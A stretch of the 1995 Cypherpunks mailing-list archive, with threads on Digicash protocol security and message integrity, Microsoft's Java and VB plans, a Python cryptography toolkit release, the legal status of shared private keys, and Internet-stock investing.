7 12:50:20 1995 From: aleph1 at dfw.net (Aleph One) Date: Thu, 7 Dec 95 12:50:20 PST Subject: [NOISE] Re: FW: websurfer 4.6 In-Reply-To: <199512072012.PAA21672@bb.hks.net> Message-ID: On Thu, 7 Dec 1995, Rich Graves wrote: > On Thu, 7 Dec 1995, Anonymous wrote: > > > Not surprising. They confuse random doodling with software, too. > > > > The real problem with NetManage is a severe case of brain death. > > My, thanks for your opinion. > > It may interest you to know that Microsoft recently licensed a bunch of > stuff from NetManage (San Jose Merc, no real details given). > > - -rich Another interesting tid bit is thta the code for Microsfot Internet Explorer is licensed from Spry which has lincensed Java from Sun so theoricly Microsoft will get Java for free (so to speak) now the question is wheather they will be stupid enough to strip it out of their product because they want to push VB. Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 From daw at guaymas.CS.Berkeley.EDU Thu Dec 7 12:57:33 1995 From: daw at guaymas.CS.Berkeley.EDU (David A Wagner) Date: Thu, 7 Dec 95 12:57:33 PST Subject: Still more on the Digicash protocol Message-ID: <199512072056.PAA21957@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , Rev. Mark Grant wrote: > I think he means you shouldn't use a stream cipher like RC4 that XORs the > plaintext with the generated keystream, since if you know part of the > plaintext, you can XOR those bytes with (the id you want) XOR (the id > being sent) and change the encrypted data so that the payment goes into > your account and not theirs. Right. RC4 encryption doesn't provide message integrity. And I should mention that block ciphers like DES in chaining modes like CBC don't provide message integrity either -- it's a bit harder, but an active attacker can still tamper with the ciphertext to modify the plaintext in a predictable way, like with RC4. I admit it's a more difficult to mount this attack against a block cipher in chaining mode, and the success probability may go down (depending on the circumstances), but hey! paranoia is your friend; and my point remains valid: Don't count on encryption to give you message integrity. If you need message integrity, use a MAC. If you want a citation for this basic crypto design principle, I'll be happy to provide one. > This is a tough, but potentially feasible > attack if you use that kind of encryption scheme. Tough!? It's trivial for an active attacker, in the stream cipher case. He just xors some bits: no clever cryptanalysis needed. (Or did you mean it's tough to mount an active attack? I agree: that requires significant knowledge or motivation.) > Is there anywhere that you could use a similar attack on SSL ? Not in SSL v3.0; it explicitly uses a (cryptographically strong) MAC (message authentication code) on each message to prevent tampering and modification. Dave Wagner, speaking for himself, but thankful for all those behind the scenes who are helping to improve and open up Digicash communications. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMMdVCCoZzwIn1bdtAQHEvQF/c1wmuVWCpmMo+4jY0cNlrrKD/5vYb/st xC2dFLgb1ydJm6kfWRw0Hz8vF55tzj9t =N+Gr -----END PGP SIGNATURE----- From cme at acm.org Thu Dec 7 13:28:43 1995 From: cme at acm.org (cme at acm.org) Date: Thu, 7 Dec 95 13:28:43 PST Subject: Is there a lawyer in the house? In-Reply-To: <199512071807.KAA07498@comsec.com> Message-ID: <9512072127.AA28756@tis.com> -----BEGIN PGP SIGNED MESSAGE----- >Date: Sat, 2 Dec 1995 03:39:00 -0500 (EST) >From: Black Unicorn >Subject: Re: Netscape gives in to key escrow >An individual has no legitimate expectation of privacy in the encryption >numbers in his GAK browser, we reasoned, because he voluntarily conveyed >those numbers to the government when he purchased the software. It could be even worse. I was on a panel last year with Scott Charney (sp?) (I believe from DoJ) during which he commented that if you give your secret key to anyone -- e.g., your own company -- then you have given up the presumption of privacy. That leaves the police open to get that secret without a warrant. This claim should be checked by a real lawyer. +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | +---------------------------------------------- Jean Ellison (aka Mother) -+ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMMdbP1QXJENzYr45AQF64QP/dXHnfLuh6FFwCY2GxKNYC5lHlj/hcFmy KqwWLYVqyr5vf/ZFEA6wlnVRMAARnenfCDmu7XQ9v9YzRjVrpjQMQAFrl9qlBivB 5wFGYSLME9sVtKIIPR0YSV8Xbw613bLmEnKiGrXxPNQ/bkaO30WOxG3N9Oen9DX4 sFfVbA+Ek0c= =CEEO -----END PGP SIGNATURE----- From llurch at networking.stanford.edu Thu Dec 7 13:30:17 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Thu, 7 Dec 95 13:30:17 PST Subject: [NOISE] Re: FW: websurfer 4.6 In-Reply-To: Message-ID: On Thu, 7 Dec 1995, Aleph One wrote: > On Thu, 7 Dec 1995, Rich Graves wrote: > > > > It may interest you to know that Microsoft recently licensed a bunch of > > stuff from NetManage (San Jose Merc, no real details given). > > Another interesting tid bit is thta the code for Microsfot Internet > Explorer is licensed from Spry which has lincensed Java from Sun so > theoricly Microsoft will get Java for free (so to speak) now the question > is wheather they will be stupid enough to strip it out of their product > because they want to push VB. And the answer, if you believe what they say, is in a series of PowerPoint presentations and speech transcripts on Microsoft's Web server. http://www.microsoft.com/internet/ I found Bill Gates' presentation rather amusing because he uses the term "broadband" to mean "high bandwidth." He seems to have gotten confused because ATM is supposed to be both. The bit on server tools says Microsoft plans to do everything. Doesn't look like they've really decided on anything. Microsoft Internet Explorer will become the browser choice for everyone. Microsoft Network will ensure that its content is fully accessible to any browser. Microsoft's strategy is to support VB. Microsoft's strategy is to support Java. Microsoft's strategy is to support Blackbird. Microsoft's strategy is to support HTML and VRML. Microsoft supports Internet and Windows Standards (the latter are not defined). The pictures were pretty, though, especially in the Maritz piece. (Which was actually prepared by Bill Conte... how convenient that MS Office saves the author's name and other summary information by default.) -rich From nsb at nsb.fv.com Thu Dec 7 13:42:36 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Thu, 7 Dec 95 13:42:36 PST Subject: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment) In-Reply-To: Message-ID: [I'll respond to several people's comments on this thread all at once.] Excerpts from mail.limbo: 6-Dec-95 Re: Geodesic Payment System.. Robert Hettinga at shipwrig (6688*) > >To be perfectly clear: our minimum service charge is 30 cents, not 5 > >dollars. If we didn't think it was worthwhile to take transactions that > >small, we wouldn't do so. > Fine. Are we including the cost of the credit card transaction to the > consumer? Fees, interest, that stuff? There are lots of hidden costs in a > book entry system. With a bearer-certificate system, the price is the > spread between the certificate's bid and asked prices for (a traveller's > check, for instance, is asked at a primium, and redeemed at face value, for > instance. That's all the cost of using them.) This includes *everything*. The 29 cents plus 2% includes all credit-card related fees. > That may be true, Nathaniel, but just because the people who bring the > money off the net need to be identified to the digital cash underwriter's > (actually the underwriter's bank's) satisfaction, doesn't mean that the > trades on the net can't be totally anonymous. We've gone over this before. Yes, this is absolutely true. I didn't mean to imply otherwise. The question is whether or not the possibility of true anonymity in the net transactions might widen the door for fraud on the conversion. I think that it does, in the sense that there's no good way to answer the question, "is it reasonable for Robert Hettinga to be cashing in $2 million of ecash today?" In a non-anonymous system, audit trails could be called up automatically on any "suspiciously large" transaction, and this would help to limit fraud (along with some other, less desirable social consequences). I'm not saying that this kind of accountability would necessarily be a good thing, merely trying to explain why banks are leery of true anonymity. > So, given that model, what's the problem? None at all, if you can find an underwriter who is comfortable with the fact that his investigative options will be limited in the case of suspiciously large or suspiciously frequent "cash out" events from a given customer. Apparently Mark Twain Bank finds that risk acceptable. I'm sure the larger banks will be watching quite closely. Excerpts from mail.limbo: 6-Dec-95 Re: Geodesic Payment System.. Wei Dai at eskimo.com (1462*) > >..... There's a good reason that most > > companies have "Ltd" after their name instead of "Unlimited", in those > > countries where that's the naming convention. > I find this argument totally unconvincing. No risk is unbounded. The > worst thing that can possibly happen is that a nearby star goes supernova > and completely destroys the earth. Yet markets handle this > low-probability risk quite well. > The direct cost of a break-the-bank catastrophic failure is bounded by the > amount of capital the bank has. This is because the market will not > accept more liabilities (real or forged) from the bank than its capital. > There may be other indirect costs resulting from dislocations, but these > should also be proportional to the size of the bank. Therefore your > argument is really against centralization and for diversification and > distribution. I'm sorry, when I said "unbounded" I was talking in a practical sense. Very few banks are willing to undertake a venture in which there is a very-low-probability risk of a failure that is only bounded by their total asset pool. Technically, you are correct, that is always the practical bound. From a bank's perspective, however, "enough to break the bank" is a good working definition of "unbounded risk". They like their risk bounded at a slightly lower threshhold... :-) Excerpts from mail.limbo: 6-Dec-95 Re: Geodesic Payment System.. "E. ALLEN SMITH"@mbcl.ru (1656) > The risk in question is not infinite-cost. If the person who gets > ahold of the keys starts simply making lots and lots of money, in a free > market the prices in digital cash for everything will start going up. This > phenomenon will be spotted, and those taking the particular variety in > question will stop accepting it. Losses are limited to however much was out > there at a given time, and if there are multiple systems with free-market > interconversion between them, that may not be very much. People will move > out of a decaying monetary system if: A. the new system is as easy to get > as the old; and B. the new system is as easy to spend as the old. > If the person who gets the keys simply uses them on a small scale, > then the resulting inflation and loss of value can simply be dealt with > using the discount mechanism. It's no longer infinite risk. Basically, the criminal in this scenario has a choice between greed and vandalism. If he's motivated by greed, and he's clever, he'll push things slowly in the inflationary direction, as you describe. If he's a vandal or terrorist at heart, however, he might get more satisfaction out of generating the equivalent of overnight inflation at the billion-percent level. That's not a decaying monetary system, it's a suddenly-collapsing monetary system. The only difference between those two scenarios is the quantity of bad money the criminal chooses to print and distribute. (Note that this is very different from physical counterfeiting, where the logistics of actually feeding trillions of dollars into the money supply are quite daunting, and make the catastrophic-vandal scenario more or less impossible.) Excerpts from mail.limbo: 6-Dec-95 Re: Geodesic Payment System.. Peter Monta at qualcomm.com (892*) > Why "the bank", rather than "all banks"? If there is a single > cryptographic point of failure in a widely used ecash system, > it seems unlikely that diversity would buy you anything. The > worry would not be the compromised keys of a single bank, but > rather, say, an effective cryptanalysis. I would put this in > the supernova class; it may be just as unlikely. There's a big difference between breaking the algorithm and stealing the keys. To break a cryptographic algorithm requires either a revolutionary mathematical discovery or the discovery of a subtle coding flaw. The former is in the supernova category, and the latter is probably in the "major hurricane" category. However, stealing the keys is a relatively simple computer crime. You break into a computer somewhere and steal some information. It only breaks a single bank, but that's enough to satisfy most criminals..... -- Nathaniel -------- Nathaniel Borenstein | (Tense Hot Alien In Barn) Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON: FAQ & PGP key: nsb+faq at nsb.fv.com | http://www.netresponse.com/zldf From aleph1 at dfw.net Thu Dec 7 13:50:49 1995 From: aleph1 at dfw.net (Aleph One) Date: Thu, 7 Dec 95 13:50:49 PST Subject: [NOISE] Re: FW: websurfer 4.6 In-Reply-To: Message-ID: On Thu, 7 Dec 1995, Rich Graves wrote: [snip] > Microsoft's strategy is to support VB. [snip] > -rich > Its interesting to note that all the people that were raving mad about Java seem to be quiet now that MS is proposing to use VB. At least Java was designed from the ground up with security in mind. But VB? Actual binary DDL running around. Just as an explame look at Oracles new PowerBrowers. They have what they call CSP (or client side processing) which are just that VB DDL's that you keep in your machine and if you dont have one d/l. Now their docs say that once you download all it does is warn you so you can authenticate it and scan it for viruses. This is not good. Wanna bet who many people dont? And this is not like Netscape plug ins. Where Netscapes plug ins are ment to handle major content types (like streaming video) and you would get them from a company that then you can sue, CPS are ment to be used anywhere fron plugins type apps down to Java type applets like a ticker tape (their exmaple). Also not that Oracle included BASIC as their client side scripting language. By readin gthe web pages I saw that the scripts seem to have access to the clients history, profile, et la. Anyone for a "Hack Oracle Content"? I will d/l today an play with it, if I mind by guess true who will give me a t-shirt? Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 From andrewk at dexotek.ca Thu Dec 7 13:58:51 1995 From: andrewk at dexotek.ca (Andrew Kuchling) Date: Thu, 7 Dec 95 13:58:51 PST Subject: Python Cryptography Toolkit v1.0.0 Message-ID: <9512072158.AA15573@toad.com> I've just uploaded version 1.0.0 of the Python Cryptography Toolkit, a collection of cryptographic routines for the Python programming language. It's at ftp://ftp.cwi.nl/pub/pct/pycrypt100.tgz. All my code is public domain; some of the algorithm implementations are GPLed. The Toolkit now contains various cryptographic algorithms such as DES, IDEA, MD5, etc. I will fix bugs in the software, and may add or remove the odd module if some startling new research result comes out, but things should be pretty stable from now on. The algorithms available are: Hash functions: Haval, MD2, MD4, MD5, SHA. Private-key encryption: Blowfish, DES, DES3 (Triple DES), Diamond, IDEA, Alleged RC4, 32-bit RC5, REDOC III. Public-key: Digital Signature Standard, ElGamal, RSA. (There's a non-functional ESIGN module included, too; I'll finish it for a subsequent release.) Python is an interpreted scripting language; see http://www.python.org for more information, the source code, and binaries. It includes arbitrary-sized integers, so the public-key algorithms are implemented in pure Python; this entails a speed penalty, but makes the code more valuable for educational purposes. A sample usage of a hash algorithm (MD5) is: >>> import md5 >>> hash=md5.new() >>> hash.update(message) >>> hash.digest() '\235\361\034\357\217MX\2246\226\367\366Ebx\326' A sample use of an encryption algorithm (IDEA, in this case) is: >>> import idea >>> obj=idea.new('This is a key456', idea.ECB) >>> message="The answer is no" >>> ciphertext=obj.encrypt(message) >>> ciphertext '\2325$\343=)d\341^\025<\344\013\204 T' >>> obj.decrypt(ciphertext) 'The answer is no' Questions, comments, or suggestions are welcomed at the address below. Andrew Kuchling andrewk at cst.ca From jimbell at pacifier.com Thu Dec 7 14:05:32 1995 From: jimbell at pacifier.com (jim bell) Date: Thu, 7 Dec 95 14:05:32 PST Subject: Still more on the Digicash protocol Message-ID: At 10:03 AM 12/7/95 -0800, you wrote: >I am glad that DigiCash supports this type of cash which anyone can >deposit. Actually, I am surprised and puzzled that it does, given >Chaum's apparent reluctance to endorse schemes to allow payee anonymity >(due to political problems, apparently). I, on the other hand, think one of the best uses of digital cash is to drastically reduce and eventually eliminate the whole concept of "government." I see payee-anonymous digital cash as being absolutely essential. From asgaard at sos.sll.se Thu Dec 7 14:11:14 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Thu, 7 Dec 95 14:11:14 PST Subject: 1)Age etc CA 2)Swedish Digicash In-Reply-To: <2.2b8.32.19951207150646.006874cc@panix.com> Message-ID: On Thu, 7 Dec 1995, Duncan Frissell wrote: > Is there an existing Post Office Bank in Sweden? If so, can foreigners open > accounts? The UK's postal bank (Girobank) has become more like a normal Yes, Nordbanken. It started as a government owned Post Office bank but was privatized years ago. It still is closely connected to Posten. I'm sure a foreigner can open an account - the Swedish banking system is very deregulated nowadays, and Sweden is (unfortunately) an EU member. Mats From mab at research.att.com Thu Dec 7 14:12:45 1995 From: mab at research.att.com (Matt Blaze) Date: Thu, 7 Dec 95 14:12:45 PST Subject: revised librand now on ftp.research.att.com site Message-ID: <199512072219.RAA04588@nsa.tempo.att.com> Sorry for the noise, but I just discovered that the librand.shar file that I put in my ftp directory got garbled somewhere along the line. I've repaired the damage and put a correct version of the file in: ftp://ftp.research.att.com/dist/mab/librand.shar (Worst of all, the garbled version actually compiled, but you can tell you have it by its failure to link properly). Again sorry for the noise. -matt From adam at rosa.com Thu Dec 7 14:17:52 1995 From: adam at rosa.com (Adam philipp) Date: Thu, 7 Dec 95 14:17:52 PST Subject: Netscape stock on 12/7/95 Message-ID: <9512072217.AA16206@toad.com> 16% tumble today... ...is the word getting out? --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\ |PGP key available on my home page|Unauthorized interception violates | | http://XXXXXXXXXXXXXXXXX/adam |federal law (18 USC Section 2700 et| |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted | |SUB ROSA... |communications are preferred for | | (see home page for definition) |sensitive materials. | \-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/ From asgaard at sos.sll.se Thu Dec 7 14:20:19 1995 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Thu, 7 Dec 95 14:20:19 PST Subject: 1)Age etc CA 2)Swedish Digicash In-Reply-To: <199512071601.IAA23556@blob.best.net> Message-ID: On Wed, 6 Dec 1995, James A. Donald wrote: > I would wait for some more solvent foreign country to get into digicash. The Swedish crown had a bad reputation after repeated devalvations in the 70-80's. This trend has stopped, it seems, and trust has been built up in the last year (1 US$ has dropped from 9 to 6.50). Mats From gorkab at sanchez.com Thu Dec 7 14:43:44 1995 From: gorkab at sanchez.com (Brian Gorka) Date: Thu, 7 Dec 95 14:43:44 PST Subject: Micro$oft and Java Message-ID: <01BAC4CB.B3611840@loki> Microsoft announced its Internet plans, and is considering licensing Java from Sun Microsystems. Other parts of the plan: OLE controls that can be transmitted over the Web, acting like applets; Web-related enhancements to Visual Basic; commerce, security, publishing and server software. [WSJ 12/7 p.B8] IBM joined the ranks of companies licensing Java software from Sun Microsystems. The company plans to integrate the technology into all its Internet software and operating systems, including the version of Windows 3.1 it sells. [NYT 12/7 p.D2] [WSJ 12/7 p.B8] From tcmay at got.net Thu Dec 7 15:11:28 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 7 Dec 95 15:11:28 PST Subject: Is there a lawyer in the house? Message-ID: At 9:27 PM 12/7/95, cme at acm.org wrote: >It could be even worse. I was on a panel last year with Scott Charney (sp?) >(I believe from DoJ) during which he commented that if you give your secret >key to anyone -- e.g., your own company -- then you have given up the >presumption of privacy. That leaves the police open to get that secret >without a warrant. This claim should be checked by a real lawyer. Huh? You mean if you give me your key the police can get it from me without a warrant? What if I don't want to give it up, and you don't? How would the police get it without a warrant? (And "I" could be your employer, so the point is clear.) And even more strikingly, what if you give your private key to your lawyer for safekeeping? Has attorney-client privilege gone away? (Granted, there are ways to break attorney-client privilege, but these are rare exceptions. In any case, the police could not get the private key without a court order, warrant, whatever.) I can believe that some cases of giving up keys wipes out one's arguments based strictly on "privacy," but not that it wipes out other arguments. It seems to me that if one wants to voluntarily escrow private keys, for safekeeping, one's personal lawyer is a safe bet: it is very difficult to break this kind of attorney-client confidentiality, from what I know of such things. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Thu Dec 7 15:22:37 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 7 Dec 95 15:22:37 PST Subject: CPUSA = CypherPunks USA? Message-ID: At 6:39 PM 12/7/95, E. ALLEN SMITH wrote: > I suspect I know what organizations they're interested in (CPUSA et >al), but did they ask about any specific organizations? CPUSA? You mean "CypherPunks USA"? I agree that being on the Cypherpunks list is probably a serious threat to one's security clearance. After all, the things we talk about are destabilizing to governments, are conducive to creating open channels for releasing material anyone thinks is useful to be released, and even makes espionage trivial. (We seldom mention this, it being old hat, but the Aldrich Ames' of the world need no longer resort to archaic tradecraft such as leaving messages in Coke cans in the crooks of trees--digital dead drops are as close as your nearest PGP package and remailer. This is a revolution in espionage--not that I am advocating or condoning it, although it is often necessary and even moral.) Given that many of us take an explicitly trans-national approach, with little or no loyalty to local and national governments, and given that many of us advocate a Nietzschean kind of personal choice in deciding which laws to obey and which to ignore, our outlook is probably as dangerous to secret programs as membership in the Communist Party would be (especially these days, where membership in the CP would be seen as either a sign of slow thinking or quaintness). --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From unicorn at schloss.li Thu Dec 7 15:47:33 1995 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 7 Dec 95 15:47:33 PST Subject: Is there a lawyer in the house? In-Reply-To: <9512072127.AA28756@tis.com> Message-ID: On Thu, 7 Dec 1995 cme at acm.org wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > >Date: Sat, 2 Dec 1995 03:39:00 -0500 (EST) > >From: Black Unicorn > >Subject: Re: Netscape gives in to key escrow > > >An individual has no legitimate expectation of privacy in the encryption > >numbers in his GAK browser, we reasoned, because he voluntarily conveyed > >those numbers to the government when he purchased the software. > > It could be even worse. I was on a panel last year with Scott Charney (sp?) > (I believe from DoJ) during which he commented that if you give your secret > key to anyone -- e.g., your own company -- then you have given up the > presumption of privacy. That leaves the police open to get that secret > without a warrant. Uh, you managed to delete the part of my message that said precisely this - i.e. that conveying information to a third party with which you have no expectation of confidentiality estopps you from later claiming said information as a protected interest under the fourth amendment. You also deleted the citation to the case. They aren't my words, they are those of the supreme court. (The GAK bit was my extrapolation of the concept into the realm of key forfeiture) > This claim should be checked by a real lawyer. I am a real lawyer. > +--------------------------------------------------------------------------+ > |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme | > |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | > | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | > +---------------------------------------------- Jean Ellison (aka Mother) -+ > -----BEGIN PGP SIGNATURE----- [...] > -----END PGP SIGNATURE----- --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From cman at communities.com Thu Dec 7 15:59:41 1995 From: cman at communities.com (Douglas Barnes) Date: Thu, 7 Dec 95 15:59:41 PST Subject: More FUD from First Virtual Message-ID: It is important to remember that Nat Borenstein is a principal in a company that very much does not want to see anonymous e-cash succeed. Their extremely backwards technology cannot compete in the long term with cryptography-based methods, and therefore they are compelled to run around the country and on the Internet, bad- mouthing cryptography and anonymity at every turn, while pointing to some charity work for Phil Z. as a fig leaf to cover their actions in this regard (sort of like Exxon building an artificial reef and claiming to be friends of the environment.) I have, on several occasions, refuted his "infinite liability" rant, but it keeps on resurfacing. A few months ago, I wrote a short tech note on why this claim doesn't hold water. I thought I might stretch it into something longer, but other things have more urgently grabbed my attention. It's available at: http://www.communities.com/foo/noninf.txt Also, I haven't had time to confirm it, but based on conversations with and hints from Digicash people online, I'm pretty sure they are doing something similar to this (possibly better) that they are hoping to patent. --doug From tcmay at got.net Thu Dec 7 16:01:24 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 7 Dec 95 16:01:24 PST Subject: Internet Stocks Message-ID: At 11:14 PM 12/7/95, Adam philipp wrote: >16% tumble today... > > ...is the word getting out? > A few of you have corresponded with me about investments, Internet stocks, etc., so I reckon there's enough interest out there to share a few thoughts with you. Those who think this list has only to do with number theory or PGP are of course welcome to skip this message now and get back to reading Koblitz. I won't say anything negative or positive about Netscape per se, but here are some various developments: * A Smith Barney analyst today made essentially the same sort of comments that I (and maybe another or two) made several days ago, namely, that the market capitalizations are incredible ($7 B for Netscape at $170/share), that browsers are not a proprietary "franchise" (in that the standard is an open one), that a lot of competition is coming (Spyglass Mosaic, Oracle, Microsoft, etc.), and that many people hysterically bidding up the price of Internet stocks are barely aware of what this "Internet thing" is. He issued a "sell" recommendation on Netscape, an "underperform" recommendation on Netcom, Spyglass, UUNet, etc., and was generally bearish on the sector. (I saw him interviewed on CNBC, minutes before Marc Andreessen was interviewed.) * From a high on Tuesday of $170, Netscape was down to $130 at one point today. I haven't seen the closing price. * Analysts are also closely looking at the February '96 end of the "lockout" in some stock sales by Netscape employees. Basically, a lot of the shares that went to employees, etc., cannot be sold for 180 days after the IPO, which was in early August of this year. The effects of shares being put on the market is not clear, of course, and it is possible the effects will be minimal. Still, it might be prudent to take this account when considering strategies. * Microsoft also made announcements indicating a move closer to a standard Web browser strategy (as opposed to trying to sell the world on Microsoft Network). deal with Spyglass, and a licensing of JavaScript. (There've been too many deals connected with browers, Java, etc. for me to even begin to summarize here.) * Sentiment moves in waves, as per the Dutch tulip bulb scenario, and what was headed for the moon a few days ago is suddenly a turkey, to many. The whipsawing in Netscape, UUNET, Netcom, etc., is incredible: up 30 points in two days, then down 30 points in two days! By the way, some have sent me mail asking about how to sell these and other stocks short. One can sell them short directly (getting the money now and agreeing to deliver the shares at a later date), but this is risky, should these stocks rise. (And some of these shares are not readily available for short sales, due to the limited number of shares on the market and the difficulty of finding someone to lend the shares for a short sale.) One's risk is essentially unbounded (but practically there are some reasonable limits to how much the stock can rise, of course). Short sellers are always advised to remember this maxim: "He who sells what isn' his'n, must buy it back or go to prison." (It is said that some of the rise in Netscape stock price is due to "the shorts running for cover." That is, those who shorted the stock at, say, $80 are frantically trying to buy the stock to close out their positions. This can cause the relatively few shares to be bid further and further up. As I keep saying, be careful in believing this or not.) A safer strategy is to buy puts and calls, or to sell puts and calls. Buying "puts" (my mnemonic: the right to "put it" to another investor) involves, say, buying the right to sell a stock at some price in the future. Thus, one might buy a put on the Internet Index (http://www.amex.com), a collection of Internet-related stocks, to sell the IIX at $25 in April, '96 for a strike price of $255. If the IIX goes _up_, and as April approaches, that put will become worth less and less and may become worthless. If the IIX goes _down_, that put becomes more worthwhile (because one has the right to "put" it someone for $255 when the actual value of the IIX has dropped to, say, $200. (Roughly speaking, at expiration in April '96 this put will be worth $55, for a doubling of one's original investment; the pricing of options depends on a lot of things, including risk, time value of money, expectations, etc.) At this point there are no widely-available puts and calls on most of the recent high-fliers on the Internet. This is why the IIX looks to be a way to play this game. Interested investors should also look at LEAPs, which are essentially puts and calls with much longer expiration dates. A friend of mine bought $25K worth of Intel LEAPs (JAN96s) during the height of the Pentium debacle, when Intel was trading at $30, and in the next six months this $25K investment became worth over $300K. (Needless to say, your mileage may vary. Don't blame me if you lose your shirt. Bulls make money, bears make money, but pigs never make money, as another maxim goes.) --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From daw at delhi.CS.Berkeley.EDU Thu Dec 7 16:17:58 1995 From: daw at delhi.CS.Berkeley.EDU (David A Wagner) Date: Thu, 7 Dec 95 16:17:58 PST Subject: Still more on the Digicash protocol Message-ID: <199512080017.TAA23185@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Just a clarification about my comments on privacy against eavesdroppers with Digicash. I admit I didn't express myself very well the first time. In article <199512071610.KAA16536 at admin.starnet.net>, Mark Twain Ecash Support wrote: > > >Worse still, anonymity for the shop is worse with Digicash than with real > >cash. If I pay you real cash on a secluded street, you're fairly anonymous. > >If I pay you Digicash over the Internet, any passive eavesdropper could be > >recording your identy and the whole transaction. Blech. > > This is raising an issue that has nothing to do with Ecash. The complaint is > in fact about the lack of a gereral link encryption on the Internet. I agree > that this is needed, but providing it really isn't Ecash's job. I am eagerly > anticipating the general use of IPSEC. > Hrm, I think you misunderstood what I was trying to say. Assume the attacker is not doing any traffic analysis. The problem is that even then, the shop's identity (and product info, and payment amount, and bank ID, etc.) are still sent *in the clear* in the Digicash payment protocol. Thus all those items can be correlated to the payee's identity: a complete loss of privacy for the shop. There's no need to send that payment info in the clear -- why not encrypt? If it is encrypted, a passive eavesdropper can only learn the payer's & payee's identity if he uses traffic analysis, and even then he doesn't know the payment amount, product description, etc. For all he knows, the transaction could've been a $0.01 cent donation to Sameer for his anonymous remailer, or it could've been a $10,000 transfer to Sameer's machine in (virtual) Anguila-space for a few dozen Apache servers. (So this also has implications for payer anonymity & privacy, not just payee privacy. When payment info is sent in the clear, and the eavesdropper is doing traffic analysis (e.g. by sniffing the link out from a small business), the eavesdropper can correlate payer's identity with the payment amount, product description, and other buying habit information. When Digicash protocol messages are encrypted, this information isn't released, and can't be correlated with payer identity, even when traffic analysis is being done.) That's why I really wish Digicash were encrypting all its messages. And I'm very glad to hear that Digicash will support sending the entire protocol over a SSL-protected link. Great feature! I'll be looking forward to it. > >* continue specifying the protocol at a deeper level, like you promised > > (and throw in source for security-critical modules too, eh? :-) > > Writing all this down takes time. DigiCash may hire a tech writer soon. That > should improve communications between all parties. Excellent! Thanks for all you're doing to improve Digicash's anonymity, privacy, and security features, Lucky. I think it's really important to get this right in the pioneering work... - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMMeEBCoZzwIn1bdtAQFzYAF/agJtA7eal+rEP0ki34FY/vyKc/EDqJ0p QR1T+zJZ0tn6i1hwluqlmvigJpWNst41 =/NJW -----END PGP SIGNATURE----- From froomkin at law.miami.edu Thu Dec 7 17:48:04 1995 From: froomkin at law.miami.edu (Michael Froomkin) Date: Thu, 7 Dec 95 17:48:04 PST Subject: Is there a lawyer in the house? In-Reply-To: Message-ID: If Alice gives Bob her key and Bob is not a person with whom Alice has a special relationship of trust (e.g. her lawyer), then Alice has no legal grounds to complain if Bob *voluntarily* gives Carol, a Cop, Alice's key. If Alice gives Bob her key and Bob is not a person with whom Alice has a special relationship of trust (e.g. her lawyer), then Alice has no legal grounds to complain if Carol, a Cop, serves Bob with a valid warrant to seize Alice's key and in fact does so. Furthermore, there are circumstances in some states where even if there is a special relationship of trust Bob either may at his discretion or in some rarer cases may be forced to divulge the key. E.g. to prevent a crime that is about to be committed likely to involve loss of life. A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 